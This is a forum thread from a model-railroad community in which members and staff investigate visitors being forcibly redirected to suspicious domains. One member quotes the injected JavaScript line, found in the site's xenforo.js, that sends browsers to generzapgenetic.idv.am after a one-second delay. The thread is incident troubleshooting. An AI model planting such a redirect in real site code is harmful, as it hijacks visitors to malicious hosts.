Site redirects

RBrodzinsky Oct 6, 2018

  1. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    4,761
    1,405
    71
    I am getting multiple reports of folks getting redirected away from the site. I have seen it with Safari, on my iPad, but Chrome on the iPad is fine. Firefox on my PC was good, too (at least a few hours ago).

    The redirect goes to a site with url resercherass dot icu
     
  2. wvgca

    wvgca TrainBoard Member

    95
    29
    12
    firefox on win10 / pc still good as of now ..
     
  3. vasilis

    vasilis TrainBoard Member

    20
    3
    2
    redirects me to the https://generzapgenetic.idv.am/ and then stops, server not responding. firefox and chrome. antivirus stopped the same problem. no problem with other sites
     
  4. Atani

    Atani TrainBoard Member

    543
    499
    14
    mine also redirects to generzapgenetic.idv.am and Chrome kills it as the certificate for the site is not trusted by chrome 70+. This appears to be loaded from an iframe related to the twitter integration possibly. I suspect it is a rotating ad banner or something related to that.
     
  5. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    4,761
    1,405
    71
    This morning, the generzap.... is where my Safari is redirecting to. FireFox (on Win7 and Win10 machines), Chrome (on Win7, my Android phone (Galaxy S5) and iPad work) work. Chrome on my Win10 is redirecting each time the page is refreshed.
     
  6. bremner

    bremner Staff Member

    4,580
    1,787
    73
    Last night, I spent an hour or so in the files looking for changes in the code, and for malware. I did not see any signs of malware in the partition. I am running Godaddy security through it right now (they own Sucuri, so it is a good service).

    It is possible that one of the ads might be pulling in the redirect. Some hosting companies will block the JavaScripts that ad companies use due to potential issues. I have seen these cause issues with injections.
     
  7. Atani

    Atani TrainBoard Member

    543
    499
    14
    So, what are the options? Right now the site is unusable in a browser due to redirect being sent repeatedly while sitting on the page, even entering a message for a post was resulting in multiple redirects before I could type and submit.

    Sent from my ONEPLUS A5010 using Tapatalk
     
  8. bremner

    bremner Staff Member

    4,580
    1,787
    73
    I am trying to narrow it down, I have not seen an issue with any device using Chrome.
     
    Atani likes this.
  9. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    4,761
    1,405
    71
    I did have a Chrome issue on my Windows 10 PC (Lenovo Yoga 710) FF on that PC was just fine
     
  10. wvgca

    wvgca TrainBoard Member

    95
    29
    12
    it happened once while using windows 10 / pc box / firefox .. back to semi-normal
     
  11. Mr. Trainiac

    Mr. Trainiac TrainBoard Member

    480
    340
    9
    Could it have something do with the fact that this site is not secure? Is this like the hack that happened a year or two ago? I am on my iPad right now (website), but yesterday, my laptop was going to the site RBrodzinsky said.
     
  12. bremner

    bremner Staff Member

    4,580
    1,787
    73
    I really think that the issue is not on our server, but on an ad. It would be interesting to know what ads were on the page before the redirect, but with how quickly it happens, you can't see everything.

    I looked in all of the normal files for a redirect and did not see any issues.

    On a professional level, I look for malware on websites all the time.
     
  13. bremner

    bremner Staff Member

    4,580
    1,787
    73
    The not secure warning in Chrome simply means that there isn't an SSL certificate. An SSL incrypts data that is entered into the site.

    https://security.googleblog.com/2018/02/a-secure-web-is-here-to-stay.html
     
  14. Mr. Trainiac

    Mr. Trainiac TrainBoard Member

    480
    340
    9
    Since this is a recent issue, I am trying to think what new ads were on the page. I am looking at a Halloween train ad for MircoTrains right now, and Bluford got a new backgroundround on one of their ads. Other than that, I don’t know. Could one of our advertiser’s sites gotten messed with, which screwed ours up too?
     
  15. Atani

    Atani TrainBoard Member

    543
    499
    14
    I found one reference to generzapgeneric.idv.am in my browser session log that points to zenforo.js as initiator of the forced redirect, the following is in the js file:
    Code:
    setTimeout(function(){ window.location = "https://generzapgenetic.idv.am"},1000);
    
    Near the top of the js file returned from this url: http://www.trainboard.com/highball/js/xenforo/xenforo.js
     
    bremner likes this.
  16. bremner

    bremner Staff Member

    4,580
    1,787
    73
    Thanks for the info, but I went through ALL of the js that loads when the FOS loads, there is nothing in there calling on generzapgeneric.idv.am.
     
  17. Atani

    Atani TrainBoard Member

    543
    499
    14
    It is very weird, it is there when I pull the js file linked above. No clue how or why that line is in there..

    Sent from my ONEPLUS A5010 using Tapatalk
     
  18. bremner

    bremner Staff Member

    4,580
    1,787
    73
    Just restarted apache
     
  19. bremner

    bremner Staff Member

    4,580
    1,787
    73
    Java is a funny way of scripting, it calls on different items...

    [​IMG]
     
    Atani likes this.
  20. RBrodzinsky

    RBrodzinsky Staff Member TrainBoard Supporter

    4,761
    1,405
    71
    Still there on Safari. Two new ads did show up recently: The Ornament Shop and JTC Models
     

Share This Page